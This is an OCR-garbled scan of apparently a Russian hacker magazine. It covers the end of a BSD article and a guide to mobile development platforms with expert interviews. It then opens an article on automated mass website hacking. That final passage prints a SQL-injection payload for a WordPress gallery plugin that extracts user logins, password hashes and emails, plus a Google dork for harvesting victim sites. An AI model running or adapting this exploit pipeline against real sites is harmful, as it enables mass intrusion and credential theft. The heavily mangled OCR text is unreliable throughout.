а ТИШЕ ЕДЕШЬ — 

ДАЛЬШЕ БУДЕШЬ 

Размеренное, неторопливое движение к на- 
меченной цели — еще одна привлекатель- 
ная черта «альтернативных» В50. Никакой 
погони за нововведениями и желания урвать 
куски сразу всех возможных рынков. 

Проекты ОрепВЭО и ЫеіВЗО уже давно 
перешли чертузрелых, полностью готовых 
к использованию продуктов, и сейчас идет 
процесс планомерного развития и приспо- 
собления к меняющемуся рынку ІТ. Слеже- 
ние за разработкой этих ОС сродни чтению 
мантры, которая успокаивает и наводит 
на правильные мысли. И-И 



В ОрепВБО 4.5 ИЗ НАБОРА 

І СКОМПИЛИРОВАННЫХ 
ПАКЕТОВ ДЛЯ ПЛАТФОРМ 
І386/атсі64 СТОИТ ВЫДЕЛИТЬ: 

Опоте 2.24.3 
КБЕ 3.5.10 
Хісе 4.4.3 

ОрепОІПісе . огд 2.4.2 и 3.0.1 
ОрепАгепа 0.8.1 
Могіііа Рігеіох 3 . 0 . б 
Могіііа ТБипсІегЪігсІ 2.0.0.19 
Му ЗОБ 5.0.77 
РозБдгеЗОБ 8.3.6 
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ОЛЕГ ПРИДЮК 

/ А2АЫІТ0Г36МАІ1..С0М / 

Куда податься 
телефонному КОДЕРУ? 

Полный гид по мобильным платформам для программиста 

Тотфакт, что зарабатывать космокредиты на кодинге под мобилы 
нелегко, сомнений не вызывает. Именно поэтому программистов 

для ЗутЬіап, іРЬопе, ВІаскВеггу, ѴѴіпсіоѵѵз МоЬіІе, АпсІгоісІ и других 
мобильных платформ почтенно зовут девелоперами. А когда зовут 
— обещают много платить за хорошую работу. Может и тебе пора 
влиться в стройные ряды воинов мобильного Р&й? 





АРРЬЕ ІРНОЫЕ 

СПРАВКА: 

Используемые языки низкоуровневого программирования: О^есбѵе С, С++ 
Примерное количество проданныхустройств: около 1 5 млн. 

Доля рынка смартфонов: 1 6% 

Количество выпущенных моделей телефонов: 2 

ПОЗИТИВНЕНЬКО: 

• Удобный ЗЭК 

• Единый магазин программ с большим количеством покупателей 

• Не надо заботиться о совместимости с архивом вы пущен но го железа 

СО: 

• Принципиальная невозможность реализовать многие функции через 
официальный ЗИК 

• Необходимость иметь компьютер Арріе или с Мае ОЗХдля установки ЮЕ 

• Сложно продать программу дороже $5 

Софт для великого и ужасного гаджета из Куперитно не пишеттолько лени- 
вый или бездарный. Компания сумела создать глянцевый телефон, глянце- 
вый ЗИК, отполировала все грамотным пиаром и прикрепила качественную 
документацию (подробнее об этом мы писали в декабрьском цн:). 

Программы для ІРЬопе продаются легко и быстро,— владельцы сверкаю- 
щей мобилки оперативно и сзавидной периодичностью заходят в специ- 
ально отведенное место, именуемое АррЗіоге, и покупаюттам свежие игры 
и софт. Основная часть покупаемого стоит от $0.99 до $4.99. Это достаточно 
простые программы коде ров -любителей или маленьких компаний, часто 
выполняющие 1-2 функции. Такой софтласково называют іРагі (в вольном 
перевода — «яПук»]. Программы, которые после мелькания на главной 
странице попадают в Іорі 00 или, еще лучше, в Іор20, зарабатываютсвоему 



создателю тысяч и долларов. Но стандартный сценарий таков: в первый 
день появления на главной — 20-30 покупок, затем падение в архив и 1 -2 
покупки в неделю (что приноситавторупоодному-два бакса вдень или 
неделю]. Стабильно, но как-то не очень прибыльно. Подобная незавидная 
участь пости гает80% программ вАррЗіюге. 

Позитивный моментзаключается втом, что существует единый магазин, 
который уже встроен втелефон, о котором пользователи знают, куда посто- 
янно заходят и... покупают, покупают, покупают. Ни один другой производи- 
тельтелефонов не смог привить покупателям своеобразный рефлекс, что 
софт надо брать не на форумах, а в магазине. Даже охочие до халявы жители 
нашей прекрасной страны, представьте себе, софт для ЗутЬіап воруют, а 
для ІРЬопе — покупают. 

Такая вотсистема ценностей. Если грамотно подойти к вопросу и создать 
программу, кото ру юза хотят купить тысяч и пользователей, то можно срубить 
определенное количество денег. 

Используемый язык похож на С++, среда разработки и документация — в 
порядке. На чать опытно му коде ру будет легко. Своих нюансов хватает, но 
головной боли немного. Самое главное: не надо беспокоиться о совмес- 
тимости со старыми версиями ЗЭК и опера ционок (пламенный привет 
ЗутЬіап], с разношерстнымжелезом, разными разрешениями экранов и 
миллионами способов ввода данных. Имеющиеся на рынке два (фактичес- 
ки, один]телефона аппаратно чутьли не идентичны. Посему— программить 
выходит реально легче. 

ВЕРДИКТ 

Возможно, путь мобильного девелопера имеетсмысл начинатьименнос 
яблочной мобилки. Воттолько, чтобы чего-то добиться, надо уметь часто 
и много думать, ориентироваться на пользователя, чувствовать тренды и 
движения рынка. Смогешь? 
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МѴАМЕ 

СПРАВКА 

Используемые языки низкоуровневого программирования: Заѵа МЕ 
Примерное количество проданныхустройств: почти миллиард только в 
2008 году 

Количество выпущенных моделей телефонов: 80% всех выпущенных в 
миретелефонов 

ПОЗИТИВНЕНЬКО: 

• Совместима с большинством выпущенныхтелефонов 

• Легкая в освоении 

• Специалисты востребованы на рынке 

ПРОТИВНЕНЬКО: 

• Не работаетна іРЬопе, Раіт 05 и без дополнительного ПО — на ѴѴіпсІоѵѵз 
МоЬіІе 

• Много проблем с совместимостью и поддерживаемым функционалом 

• Программы сложно продать 

Джава вообще стоитособняком — это не операционная система, привязан- 
ная к конкретным производителям, а универсальная платформа, которую 
поддерживают чуть л и не все телефоны дороже $60-80 (іРЬопе не в счет, он 
от Стива Джобса]. 

Универсальность и многогранность платформы Оаѵа МЕ сочетаются с 
универсальностью и многогранностью самого языка: чтобы написать что-то 
толковое, надо достаточно неплохо разбираться в вопросе, ^ѵа-кодинг 
для мобилок напоминает верстку НТМЕ — делаешь велосипед, а потом 
создаешь для него — педали, рули и седла, чтобы каждый желающий мог 
воспользоваться. 



Правда, есть один существенный плюс: однажды написаннуюУаѵа- 
программу относительно легко адаптировать и для свежеиспеченных 
сенсорных ІЧокіа, и для настроенных на бизнес ВІаскВеггу, и для обычных 
телефонов-звонилок, и даже для чего-то совсем нового, что выйдеттолько 
через год. И все же — Джава Джаве рознь. Отсюда и много дополнительной 
работы по адаптации готовых программ для новыхустройств. 

Но все проблемы по написанию софта кажутся мелочью по сравнению 
с тем, как непросто уговорить пользователя его поставить и, тем более, 
купить. Владельцы смартфонов предпочитают нативные программы, 
а большинство (абсолютное] владельцевтелефонов и знать незнаюто 
возможности установки дополнительного софта. Те, кто знают — или не 
подозревают, где его брать, или попросту не желают этим заниматься. 
Централизованного и официального магазина Заѵа-программ нет, какие 
существуету владельцевтелефонов сформированной культуры покупать 
Заѵа-софт. 

Да, Заѵа-проги собираются на разнообразных форумах или сайтах 
вроде ОеУаг.сот, но туда ходяттолько относительно продвинутые 
пользователи или же дети, желающие вытянуть максимум из подарен- 
ной бюджетной трубки, чья цель — игры и другие развлекательные про- 
граммы (почти каку іРЬопе, кстати]. Только единицы готовы платить за 
Заѵа-программы. Заѵа МЕ — скорее, прерогатива игр (часто — нескром- 
ного содержания], которые присылаются в обмен на 5М5, отправленное 
на короткий платный номер. 

ВЕРДИКТ 

Хороший бизнес для любителей клонировать порноигрушки и развлека- 
тельные программки. Зарабатыватьдоллары можно через показ рекламы 
или контракты с оператором. 
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5ѴМВІАЫ 

СПРАВКА 

Используемые языки низкоуровневого программирования: ЗутЬіап С++, 
С.С++ 



Примерное количество проданныхустройств: 226 млн. (вместе с японски- 
ми моделями] 

Доля рынка смартфонов: 44% 

Количество выпущенных моделей телефонов: 159 

ПОЗИТИВНЕНЬКО: 



• ОС распространена и весьма перспективна 

• Специалисты востребованы и высокооплачиваемы 

• Множество средств разработки и совместимых фреймворков 

ПРОТИВНЕНЬКО: 



•Языктруден в освоении 

• Сложная система сертификации программ 

• Ряд проблем совместимости с разными моделями 



Одна изсамыхдревнихоперационныхсистем сжутко непростой историей 
и доброй сотней выпущенныхустройств. За более чем 15 лет развития 
операционку и весь сопутствующий инструментарий доделывали, переде- 
лывали, обновляли и довели до того, что все стало дико сложно. Тут и язык, 
максимально напоминающий старый добрый С, который за уши притянули к 
паттернам и идеям ООП, и переживания по поводу совместимости с разны- 
ми версиями платформы, сертификаты и прочие отвлекающие детали. 

ІЧокіа постоянно пытается поправитьситуацию — портировали фреймворк 
ОТ библиотеки Р.0.5.І.Х, базовые компоненты 5ТІ_ и ВоозЕ ряд ключевых 
АРІ С++ (ІОЭіхеатзи иже с ним]. Есть отдельные проекты, позволяющие на 
5утЬіап-сма ртах запускать ПО, написанное на С#, Рыбу, РуТзоп. Прибавь 
к этому сильное комьюнити, разнообразные поощряющие кампании для 
разработчиков...— и получишь примерную картину противоречивого мира 
ЗутЬіап-девелоперов. Что до, собственно, продажпрограмм,— долета 
об этом можно не думать. ІЧокіа анонсировала магазин ПО, который будет 
встраиваться в новые смарты, но пока непонятно, кого и кактуда пустят. 

Во всех современных девайсах с интерфейсом 360 есть сервис Ооѵѵпіоасі ! , 
куда финны пускаюттолько супер-пупер компании с высоким статусом и 
оченьтолковыми продуктами. Еще существует всетотже ОеУаг, специа- 
лизированный Напсіапдо и встроенный всайтІЧокіа магазин, ноэтоуже 
совсем другой ЕІзегЕхрегіепсе, нежели покупка софта прямо с девайса. 
Влюбом случае,— продать простенькую игру или программу в мире 
ЗутЬіап неудастся. Здесьдругие интересы и желания. ЗутЬіапЗОК 
предоставляет гигантские возможности и пользователи привыкли к 
максимально высокому функционалу. Но и стоитместное ПО не$5, а, как 
минимум, $25, ато и $50-70 (бывает и такое]. 



ВЕРДИКТ 

ЗутЬіап-девелоперам лучше развиваться в сторону работы в софтверной 
компании, нежели в качестве индивидуального кодера. Вот это — действи- 
тельно перспективно и пахнетзелеными купюрами! 



АЫОКОШ 

СПРАВКА 

Используемые языки низкоуровневого программирования: Заѵа 
Примерное количество проданныхустройств: 1 миллион 
Доля рынка: менее 1 % 

Количество выпущенных моделей телефонов: 1 

ПОЗИТИВНЕНЬКО 

• Удобные средства разработки 

• Подробная документация 

• Бесплатность для разработчика 

ПРОТИВНЕНЬКО 



• Крайне мало совместимых моделей 

• Система еще достаточно сырая 

• Специалисты мало востребованы на рынке 

Эатзипд и многиедругие компании пообещали вы пустить ап паратуру на 



базе АпбгоісІ, однако сложно говорить о популярности устройств в будущем. 
Ооодіеудалосьсформировать прекрасное комьюнити, привлечь 
большое количество разработчиков и подготовить для них подробную 
документацию с множеством примеров, удобную среду разработки. Это 
несомненные плюсы, воттолько пока сложно получить за свою работу 
деньги, если АпбгоісІ-кодер, конечно, не работает на софтверную компа- 
нию сзаказчиками в далекой Америке. 



ВЕРДИКТ 

Разумнее пока выступить в роли наблюдателя. На бумаге (и в обещаниях 
менеджеров] все красиво, а вотна делеу настолько три полуодинаковых 
телефона от НТС и много-много тематических новостей на блогах. Даже в 
этом материале наши эксперты упомянули об АпбгоісІ, но сами отдаваться 
этой платформе не спешат. 



ѴѴІЫ00ѴѴ5М0ВІІ-Е 

СПРАВКА 

Используемые языки низкоуровневого программирования: С++, С# ІЧеІ: 
Примерное количество проданныхустройств: 50 млн. с начала существо- 
вания, 20 млн. в прошлом году 
Доля рынка: 13% 

Количество выпущенных моделей телефонов: более 30 новых моделей в 
прошлом году 

ПОЗИТИВНЕНЬКО 

• Позволяет работать с железом на низком уровне 
•Удобные средства разработки 

• Качественная документация 

ПРОТИВНЕНЬКО: 

• ОС сильно отстает от современныхтребований 
•Устройства — преимущественно азиатского происхождения 

• Основные пользователи — корпорации итехнофрики 



Такое ощущение, что платформу намереннозагнали втупик — она не 
отвечает современнымтребованиям кскорости работы интерфейса, 
мул ьтимедийн ости, качеству, интеграции с ѴѴеЬ и сервисами. В эпоху ярко- 
красочных АМОЕЕО-экрановѴѴіпМо поддерживает всего 65 535 цветов и 
безбожно тормозит даже на самом крутом железе. Свеженькая версия 6.5 
имеетновый макияжда пару неконцептуальных инноваций, которые мало 
исправляют положение. 

Втоже время платформа предоставляет беспрецедентно низкий уровень 
доступа кжелезу. Очень часто программы, которые можно сделать для 
ѴѴіпМо, нельзя реализовать ни на одной другой платформе. Именно поэтому 
все промышленные коммуникаторы и разнообразные специализирован- 
ные устройства делаются на этой ОС. АещеОСотМісгозоІі: используют 
вкупе с самым передовым железом. Когда -то толь ко на девайсах с ѴѴіпсІоѵѵз 
МоЬіІе можно было встретить ѴОА-экраны и ѴѴі-Бі. Теперь в ѴѴіпсІоѵѵз -те- 
лефоны ставятэкраны с сумасшедшим разрешением 800x480, с которыми 
могут соревноваться только монстры японского рынка. 

При всем обилии функций, мощном железе и богатых возможностях конеч- 
ныеустройства совершенно не удовлетворяют запросам современного 
пользователя, привыкшего к красочному и быстрому интерфейсу іРЬопе. 

У ѴѴіпМо проблема таится глубоко внутри, в кривоватом коде и медленной 
разработке новых версий. 



ВЕРДИКТ 

ѴѴіпсІоѵѵз МоЬіІе не умер и не умрет — Редмонд еще долго будет подде- 
рживать свою ОС и пытаться исправить положение. Потерю популяр- 
ности умный кодер может использовать для реализации своих амбиций. 
Ведь надо же создателям новеньких НТС что-то ставить на свои дорогие 
игрушки? 



эпилог 

Ты наверняка ждешьзаключения, гдеумныелюди отправяттебя по 
нужному адресу, скажут, что скачать, поставить и на чем кодить. И напрасно 
ждешь. Это не имеет смысла без учетов сотни вторичных факторов и уело- 
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вий. Цель статьи — помочьтебе сделать правильный выбор, увидеть тренды 
и услышать мнения экспертов. А выводы придется рождать уже самому. 
Дерзай! 



КОММЕНТАРИИ 

ЭКСПЕРТОВ 



5СІЕЫСЕ50РТ 



ОТРАСЛИ : телекоммуникации, финансовая сфера, 
здравоохранение, безопасность, инженерия, транспорти сбыт. 
МОБИЛЬНЫЕ ПЛАТФОРМЫ : ѴѴіпбоѵѵз МоЬіІе.БѵтЬіап Ш2МЕ. Вгеѵѵ. 
АпбгоісІ. 

ПОДРОБНЕЕ : зспзоЛс от . 

О ЗАКАЗАХ : сейчас, скорее, мы объясняем клиенту, для какой платформы 
ему лучше разрабатывать ПО, нежели наоборот. Клиенты приходятлишьс 
идеями и сильнымжеланием воплотить их вжизнь. Дальше — уже работа 
нашихэкспертов. В зависимости от сферы деятельности, образа конечного 
пользователя и других факторов, эксперты планируют и рекомендуютте или 
иные платформы. 

О ПЕРСПЕКТИВАХ : сложно выделить приоритетную платформу. Мы одно- 



временно развиваем несколько направлений, таких как: ВутЬіап, ^МЕ, 
ѴѴіпМо, іРбопе, АпбгоісІ и Ыпих, чтобы быть готовыми квозможным пере- 
менам рынка ичтобы нас не задели трудные времена или затормаживание 
развития любого игрока индустрии. 

О РАБОТЕ: мы считаем, что успех проекта зависит не от исполняемого языка 
или платформы, а от степени готовности команды крешению возможных 
(прогнозируемых] проблем, а также от степени сложности проекта, конечно- 
го видения продукта заказчиком и нашей готовности быстро, качественно 
сделать продукт в отведенные сроки. 



САСШ550РТ 



ОТРАСЛИ : мобильное ПО, встроенное ПО, ѴоІ Р, Оаѵа, 
.ЫЕТ, сложные ѴѴЕВ-приложения. 

МОБИЛЬНЫЕ ПЛАТФОРМЫ : іРЬопе.Апбгоіб.ѴѴіпсІоѵѵз МоЬіІе. ВІаскВеггѵ. 
ВутЬіап, ^МЕ. Подробнее: сасІиззо^.Ьіг . 

О ЗАКАЗАХ : последние пол года мы получаем много заказов на разработку 
под іРбопе. Большинство наших заказчиков — американские компании, а в 
США іРбопе очень популярен. Подогревают интерес к программированию 
под іРбопе и многочисленные зиссезз зіюгіез о «выстреливших» програм- 
мных продуктах. 
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АЛЕКСАНДР 

ТРУФАНОВ 



О ПЕРСПЕКТИВАХ : сейчас ориентируемся на ІРЬопе, ЗутЬіап и ВІаскВеггу, 
таккакуже накопили достаточно опыта, а внушительное портфолио привле- 
кает новых клиентов. В долгосрочной перспективе (скорее всего, ближе к 
201 0 году] мы рассчитываем на потокзаказов под Ооодіе АпбгоісІ. 

О РАБОТЕ : концептуальной разницы между проектами для разных систем 
нет, но для ІРЬопе и АпсІгоісІ, в общем, получается легче. Вдальнейшем 
разрабатывать под АпсІгоісІ будет сложнее (из-за большого количества 
устройств на рынке от различных производителей, что потребует дополни- 
тельных работ]. 



6ЕТМР 



| ОТРАСЛИ : самый популярный в мире каталог мобильного ПО и 
комьюнити разработчиков. 

ПЛАТФОРМЫ : Цаѵа. 5утЬіап, ѴѴіпсІоѵѵз МоЬіІе, ВІаскВеггу, Раіт, ЕІазЬ Еке. 
Подробнее: ае^аг.сот . 

О ПЛАТФОРМАХ : сегодня самой популярной платформой, без сомнения, 
является ^ѵа. В этом несложно убедиться, просмотрев нашу стати стику: 
зіаіз.аеііапсот . Большинство из первой двадцатки поддерживаеттолько 
Заѵа. И вообще, на рынке максимальное количество ^ѵа-совместимых 
телефонов. Что касается ближайшего будущего, то через 3-5 летлидерами 
станутВутЬіап и ІРЬопе (в приведенном порядке]. ІЧокіа активно продвига- 
етВутЬіап, поэтому, пока она не сменит политику, у ВутЬіап будетогромная 
доля рынка. Доля рынка іРЬопе увеличится после появления более деше- 
вой модели, что должно случиться относительно скоро. 
ОБАЫРКОІР :АпсІгоісІ претендуетна место доминантной Ыпих-платформы. 
Он предлагает гибкуюсистемулицензирования, ничего не стоит произво- 
дителям и удобен для разработчиков. 

О РАБОТЕ : отличие ОеУаготдругих магазинов и мобильных приложений в 
том, что мы не ограничиваем пользователя какой-то одной или парой плат- 
форм. Мы предоставляем максимальный выбор, привлекаем разработчиков 
всех перспективных платформ и позволяем им заработать. Наиболее аетивно 
развиваются отделы Заѵа,5утЬіап, ВІаскВеггу, ѴѴіпсІоѵѵз МоЬіІе и АпбгоісІ. 



АЛЕКСАНДР ТРУФАНОВ 



ОПЫТ РАБОТЫ: ВѵтЬіа п 05 (платфор- 
мы 560 и 1)10), немного ѴѴіпсІоѵѵз МоЬіІе. 

ЗАСЛУГИ: АссгесІ кеб 5утЬіап Оеѵеіорег, Рогит ІЧокіа СЬатріоп. 

ЛЮБИТ : 5утЬіап 05, платформа 560. 

НЕ ЛЮБИТ : ІРЬопе 

ОКОДИНГЕ: 5ѵтЬіап С++ позволяет сделать на 560то, что не могут ни 62МЕ, ни 
какой-либо другой языкпрограммирования или технология. Изучать его можно 
сразу после базового курса ООП и С++, который многим читают в вузе. Опыт раз- 
работки приложений для ѴѴіпсІоѵѵз нетребуется — наоборот, может помешать. 
«Индусский код», пренебрежение правилами, даже нарушение согла- 
шения об именовании объектов — отольются программисту бессонными 



ночами за дебаггером. Все это я знаю по собственному опыту, такчто мой 
совет — сначала читайте книжки и не один раз, до тех пор, пока не поймете 
теорию, и только потом садитесь за СагЬібе. 

Последние 5РК носят приставку аи-іп-опе: в них входят средства разра- 
ботки на 5утЬіап С++, Ореп С/С++, баѵа, ѴѴВТ (виджеты для браузера) и 
РуіЬоп. В качестве ЮЕ рекомендую СагЬібе.с++ 2.x — это наиболее мощный 
и удобный инструмент, ктому же, с декабря 2008 ставший бесплатным. На 
данный момент СагЬібе.с++ позволяет создавать приложения на 5утЬіап 
С++, С/С++ и СЕ 

О ДОКУМЕНТАІІИИ :5РК комплектуется внушительным справочником. В 
целом, недостатка в документации по платформе 5утЬіап нет. Единствен- 
ная проблема — очень мало русскоязычных материалов. 

О КОМЬЮНИТИ :за ответами на частные вопросы можно обратиться в 
Еогит ІЧокіа. Это полноценная организация, в задачи которой входит вза- 
имодействие с бизнесом и разработчиками. За документацией на русском 
можно сходить на беѵтоЬіІе.ги . 

ОБАЫРРОІР : Апбгоіб слишком сырой. Ооодіе удалось отчасти повторить 
ѴѴОѴѴ-эффектАррІе, и многие программисты возложили на него необос- 
нованные надежды. Ноя бы подождал, пока Апбгоіб покоритобещанные 




высоты, прежде чем всерьез рассматривать эту ОС. Апбгоіб уже сейчас 
имеет серьезные проблемы с совместимостью. Боюсь, для этой ОС будут 
характерны все недостатки 52МЕ. Создание приложений на 5аѵа — за- 
нятие несложное, поэтому сообщество АпбгоісІ-разработчиков довольно 
многочисленно, азначит— высока конкуренция. Как разработчик, я сейчас 
не вижу возможностей получения прибыли от создания приложений для 
гуглофонов. 

ОБ ІРНОЫЕ : разработка приложения для ІРЬопе не импонирует мне 
по идейным соображениям. Платформа Арріе имеет большое число 
ограничений, как вследствие технических особенностей, так и из-за 
особой политики компании. Целые классы приложений для ІРЬопе 
создать просто невозможно. Среди однотипных программ сложнее 
конкурировать, и на первое место выходит маркетинг, а не мастерство 
разработчика. 

О ДЕНЬГАХ : 5ѵтЬіап имеет ряд преимуществ перед другими ОС — это 
широкие возможности и распространение. Свой Арр5іоге недавно орга- 
низовал 5атзііпд, ІЧокіа анонсировала Оѵі 5іоге и предоставляет набор 
различных программ по взаимодействию с бизнесом и каналы продаж 
софта и контента. 
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АЛЕКСАНДР БАКУНОВИЧ 



ОПЫТ РАБОТЫ : Ц2М Е. ѴѴіпсіоуѵз 



МоЬіІе 2003/2005/6. 0, АпсІгоісІ. 

ЗАСЛУГИ : Зепіог Оеѵеіорег. 

ЛЮБИТ : 32МЕ (МІРР2.0+). ѴѴіпсІоѵѵз МоЬіІе. 

НЕ ЛЮБИТ : ЗѵтЬіап. 

ОБАЫРКОІР : на боодіе АпсІгоісІ легко перейти, еслихорошознаешьЗаѵа.У 
языка/платформы есть свои сложности и заковырки, но где их нет? Вообще, 
в плане заковыроку всехтелефонов нормальное распределение, то есть, у 
всех количество багов примерно равно :). Ооодіе сумела сваятьоченьудоб- 
ныйЗРК, создав условия для комфортной работы девелопера. Понятно, что 
все это еще довольно сырое и будет меняться, но уже сейчастут много всего 
удобного. И над Соодіе не висел хвост совместимости с предыдущими 
версиями платформы и архивом девайсов, поэтому АРІ для АпсІгоісІ чище и 
красивее. 

О ДОКУМЕНТАЦИИ документацию сделали почти идеально — подробная 
и доходчивая. Я бы оценил на 4 по пятибальной. Да и комьюнити уже сфор- 



«ООО0І-Е СУМЕЛА СВАЯТЬ 
ОЧЕНЬ УДОБНЫЙ БОК, СОЗДАВ 
УСЛОВИЯ ДЛЯ КОМФОРТНОЙ 
РАБОТЫ ДЕВЕЛОПЕРА. 

НО, ЧТО ВСЕ ЭТО ЕЩЕ ДОВОЛЬ- 
НО СЫРОЕ И БУДЕТ МЕНЯТЬСЯ, 
НОУЖЕ СЕЙЧАСТУТ МНОГО 
ВСЕГО УДОБНОГО». 



мировалось. За советом и помощью смело можно шагать на сосіе. дооаіе. 

сот/апсІгоісІ/дгоирз.ЫппІ . 

ОБ ОСТАЛЬНЫХ : лично мне, наверное, больше всего нравится Д2М Е (М ЮР 
2.0+]. Она наиболее продумана, хотя и со своими недостатками. Раздражает 
вопрос совместимости с разными моделями телефонов, когда у каждого 
производителя определенный набор АРІ. 

На втором месте — ѴѴіпсІоѵѵз МоЬіІе. Эта ОС дает программисту больше воз- 
можностей поуправлениюжелезом телефона, но и знать нужно больше. Для 
32МЕ и для ѴѴМ есть отличные ЮЕ (Есіірзе и ѴізиаІЗШсІіо) и средства отлад- 
ки. Очень много документации и различных Ьоѵѵ Іо. И там, и там нужен опыт, 
сразу мало что получается. Переход на эту платформу означает максимум 
сидения за дебагом и на форумах, минимум кодинга. Под ѴѴіпМо помогает 
опытпрограммирования ѴѴіпАРІ. ЗутЬіап мнесовсем не понравилась. 
Возможно, потому что знаком относительно поверхностно. 

ОДЕНЬГАХ : пока возможности продавать через АпсІгоісІ Магкеінет, но 
обещают, что вот-вот будет. Я сейчас разрабатываю Аидтепі: Веаіііу — игру 
для АпсІгоісІ. Можно считать, что это хобби. Надеюсь, из него получится что-то 
достойное. 



шшшшт ОПЫТРАБОТЫ : Ц2МЕ. Зопу-Егісззоп ІЩ 
Моіюгоіа, немного ВІаскВеггу 05 и были еще платформы от ЬО и Затзипд. 
ЗАСЛУГИ :5ип СегбГесІ МоЬіІе Арріісабоп Оеѵеіорег. 

ЛЮБИТ : Зопу Егісззоп — 4еѵег! 

НЕЛЮБИТ:540, 560 за большое количество недокументированных огра- 
ничений. 

ОЦАѴАМЕ :ѵчастники ЦаѵаСоттипіГ/ Ргосезз во главе с5ип усиленно дора- 
батывают Оаѵа МЕ, но новые решения принимаются как-то очень медленно и 




несогласованно, поэтому производители дела ют свои ни с чем не совместимые 
АРІ. Отсюда все проблемы и головная боль. Не существует стандартно го АРІ для 
обработки звонков или ІпзІапШеззадіпд.нетЗІР-стекадляѴоІР, а стандартный 
набор ІЛ-компонентов более чем скромен. Все это и многое другое у каждого 
производителя уникально, а кодеру приходится подстраиваться. Лучом света в 
темном царстве вы гл ядтЛаѵаЕХ МоЬіІе, но это будущее. Возможно, далекое. 
ОКОДИНГЕ : 5аѵа МЕ по синтаксису практически совпадает с «большой» 
5аѵа. Отсутствует Г па Іігабоп, Л\ІІ для работы с библиотеками, написанными 
не на 5аѵа, и есть ряд других ограничений. Все классы, относящиеся кМЕ, 
сгруппированы внутри пакетов]аѵах.тісгоесІіЬоп. Стандартные средства 
языка сгруппированы потем же пакетам, что и в 5аѵа 5 Е, только, конечно, в 
весьма сокращенном составе. 

Большим недостатком является отсутствие инструментов для удобной от- 
ладки приложений на устройствах, ведь работающая на эмуляторе програм- 
ма вовсе необязательно также без проблем будет исполняться на телефоне! 
О СОВМЕСТИМОСТИ : когда речьзаходито менеетривиальных вещах 
(например, ргодгеззіѵебоѵѵпіоасі, ВІиеІюоШ-чатс несколькими (более чем 1] 
устройствами], обнаруживается масса плохо документированных особен- 
ностей, приспособиться к которым предстоит непосредственно програм- 
мисту. Кроме всего прочего, реальныеустройства страдают всяческими 
ограничениями в ресурсахи прочими неприятными«сюрпризами». 
ОДОКУМЕНТАЦИИ : все, что касается базовой платформы ЛѴѴІ-устройств 
Раѵа ТесЬпоІоду БогѴѴігеІезз ІпсІизЕгу], — хорошо проработано и отлажено. 
Но дьявол кроется в деталях, и добравшемуся до тестирования приложения 
на телефоне вряд ли удастся обойтись без углубления в детали. Готовьтесь к 
часам корпения вбеЬид’е. 

О КОМЬЮНИТИ: существует несколько больших девелоперских комьюнити. 
посвященных разработке мобильных приложений. В первую очередь, это ре- 
сурсы, поддерживаемые производителями телефонов. Лучшие— у І\Іокіа,5опу 
Егісззоп, Моіюгоіа. Кроме, естественно, спецификаций и диісіе-ііпез, доступных 
для скачивания, ответы на некоторые вопросы, связанныесособенностями 
имплементациитой или иной функциональности, можно найти на форумах. 
ОБАЫРКОІР : в мобильном подразделении компании ЗсіепсеЗо^ ( уууѵуѵ. 
зсіепсезоіі.сопп ) , где я работаю, мы участвуем в проектах по всем на- 
правлениям развития мобильной Лѵа: Э2М Е, ВІаскЬеггу (которая очень 
близка кстандартам 5ип), АпсІгоісІ. Сейчас многие]аѵа-программисты с 
надеждой смотрят в сторону АпсІгоісІ. Он таки открыл многие недоступ- 
ные ]2те-шникам АРІ — это отличная новая ниша для роста доли рынка 
5аѵа, пусть и не в русле политики 5ип. А к 52МЕ-платформе в полной мере 
применимы слова генерала Де Голля: «Ее ждет великое будущее, и всегда 
будет ее ждать. . . ». т 
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РОМАН «5РІНІТ» ХОМЕНКо] 

/НТТР://Т1ЛАМС.СОМ/ 
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ПО-ПРОГРАММЕРСКИ 



Автоматизация взлома сайтов с помощью 



++++ Захватить один сайт, к примеру, за час — хорошо. А сотню? Вот уж 
і і действительно здорово! В этом нелегком деле хакерам помогают 
++++ программерские средства автоматизации. Сейчас мы, на основе 

конкретного примера, напишем тулзу на РуіЬоп, с помощью которой 
++++ захватим несколько десятков сайтов. 
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Среди множества сайтов, на которые подписа- 
на моя Н55-читалка, почетное место занимает 
крупнейший баг-трекер ЬЦрУ/тіІУѵОгт.сот . 
Постоянное чтение данного ресурса со време- 
нем подвело меня к интересной мысли — как 
на практике применить всю эту кучу постоянно 
обновляющейся информации. Я решил создать 
свой маленький хак-конвейер, который на вход 
будет принимать свежие баги с тіІѵѵОгт, а на 
выходе — выдавать много-много паролей ксай- 
там. Какты догадываешься, идею я нетолько 
довел до практической реализации, но и горю 
желанием поделиться стобой подробностями. 
Общий алгоритм работы нашего заводика будет 
таким: 

• Достать список всех сайтов, теоретически 
содержащих уязвимость; 

• Попытаться эксплуатировать уязвимость в 
каждом из них. 

Приступим! 



+ + + + 
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в ПРИМЕР ДЛЯ КОНВЕЙЕРА 

Над выбором примера долго мучиться не бу- 
дем. Возьмем последнее, что есть на тіІѵѵОгт 
под любимый многими ѴѴогсІРгегз — Ыір:// 
тіІѵѵ0гт.сот/ехр[оіі:5/8229 . где описана бага в 
плагине галереи ІМоЫод: 

Шогбргезз Ріидіп ШоЫод Кетобе 8<2Ь 
Іпдесбіоп ѴиІпегаЪіІібу 
АиЫгог: збгапде кеѵіп 
Богк: "Саііегу ромегеб Ьу ШоЫод" 



+ + + + 



Ехріоіб: Ъббр: //ѵпяѵг. зібе. 
сот/ ?раде_іб= [ѵа1іб_іб] &іб=- 
99+ипіоп+а11+зе1есб+1 , 2,3,4, дгоир. 



сопсаб (изег_1одіп, 0х3а,изег_ 
разз, 0хЗа,изег_етаі1) , 6 + бгот+щ>_ 
изегз-- 

а СПИСОК ЖЕРТВ 

Любой массовый захват сайтов начинается с 
поиска подходящих кандидатур. В описании 
автор любезно предоставил богк — фразу для 
поиска, с помощью которой можно получить 
солидный список потенциальныхжертв. 
Правда, исходя из опыта, он не совсем нам 
подойдет, ведь для сплоита нужен валидный 
идентификатор страницы. Этот идентифика- 
тор поиска нам надо будет получить одно- 
временно с ЭВІ- страницы, поэтому дорк мы 
изменим на: 

іпигі :раде_іЛ+ " Саііегу +ро\ѵегесі 
+Ъу+ ШоЫод" 

А теперь пропарсим Гугл по вышеозначенному 
Дорку: 

ЪЫр : / /тш . доодіе . сот/ 
зеагсЪ.?д=с1огк&зкагк = 0 

После загрузки страницы мы применим 
регулярку, получив с ее помощью список 
ІІНІ_ уязвимых сайтов. Составить регулярку 
легко, посмотрев на исходную страницу Гуг- 
ла после поиска: все нужное нам находится 
в теге «а», который идет после элемента с 
классом «г». Итак, прошу любить и жаловать 
наш регэксп: 



